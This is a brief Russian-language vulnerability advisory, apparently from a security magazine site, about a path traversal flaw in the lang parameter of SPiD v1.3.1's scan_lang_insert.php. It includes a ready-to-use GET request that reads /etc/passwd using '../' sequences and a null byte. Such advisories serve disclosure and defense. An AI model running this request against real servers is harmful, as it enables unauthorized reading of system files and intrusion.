Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Продукт: SPiD v1.3.1
Уязвимость существует из-за недостаточной проверки входных
данных в переменной lang сценария scan_lang_insert.php.
Пример:
Запрос методом GET:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00